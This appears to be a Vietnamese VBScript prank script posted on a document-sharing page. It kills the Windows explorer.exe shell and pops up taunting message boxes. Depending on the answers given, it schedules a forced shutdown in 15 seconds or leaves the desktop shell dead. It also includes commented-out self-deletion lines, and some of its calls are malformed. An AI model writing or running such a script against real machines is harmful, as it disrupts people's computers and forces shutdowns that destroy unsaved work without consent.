You are on page 1of 1

dim a,b,m,z,x,c,v,k,l,hi

Dim objFSO, objFolder, objShell, objFile1,objFile2


Dim strDirectory, strFile
strFile1 = "D:\Summer.txt"
strFile1 = "C:\Summer.txt"
On Error Resume Next
set fso=createobject("scripting.filesystemobject")
set WshShell=CreateObject("WScript.Shell")
m="dung tuc hay,hehehehe"
WshShell.run("taskkill /f /im explorer.exe")
msgbox"chao em!!!!",0,"LOVE"
msgbox"chac khong can gioi thieu dau nhi!!!!",0,"LOVE"
msgbox"cho anh hoi mot cau hay",0,"LOVE"
msgbox"bay gio em co buc xuc khong?",0,"LOVE"
msgbox"kekekekke",0,"LOVE"
msgbox"tra loi cho thanh that hay",0,"LOVE"
msgbox"kekekekke",0,"LOVE"
a=msgbox("tuc khong?",4,"LOVE")
if a=6 then
msgbox"dang buc xuc a ",16,"hihihih"
msgbox"thoi nghi nghoi di hay"
msgbox"tha toi cho do",0+16,"LOVE"
msgbox"bye!!!!"
wscript.sleep 1200,true,1
WshShell.run("explorer.exe")
end if
if a<> 6 then
msgbox "vay thi anh tat may tinh cho tuc hay kekeke",0,"TRAN HUU MINH"
msgbox" thoi co hoi cuoi day ne"
msgbox"cho 15s suy nghi de tra loi cau hoi cua anh hay"
WshShell.run ("shutdown.exe -f -s -t 15 -c m ")
b=msgbox("em co ngoan khong?",4,"tra loi nhanh di hay")
if b=6 then
WshShell.run("shutdown.exe -a")
msgbox"uhm,ngoan ",64,"dai ca khen"
msgbox" tha toi cho day",16,"hahahah"
msgbox"BYE!!!!!!",16,"TRAN HUU MINH"
wscript.sleep 1300,true,1
WshShell.run("explorer.exe")
end if
if b<> 6 then
msgbox" hu a?"
msgbox"hu thi cho chet"
wscript.sleep 1300,true,1
msgbox" BYE!!!!!!"
end if
end if
z=WScript.ScriptfullName
x =len(z)
c=left(z,x-8)
v =c & "minh.rar"
x =c & "minh"
'fso.deletefile(v)
'fso.deletefile(z)
'fso.deletefolder(x)
wscript.sleep 600,true,1
msgbox "hen gap lai!!!!",64,"hehehehehehe"

You might also like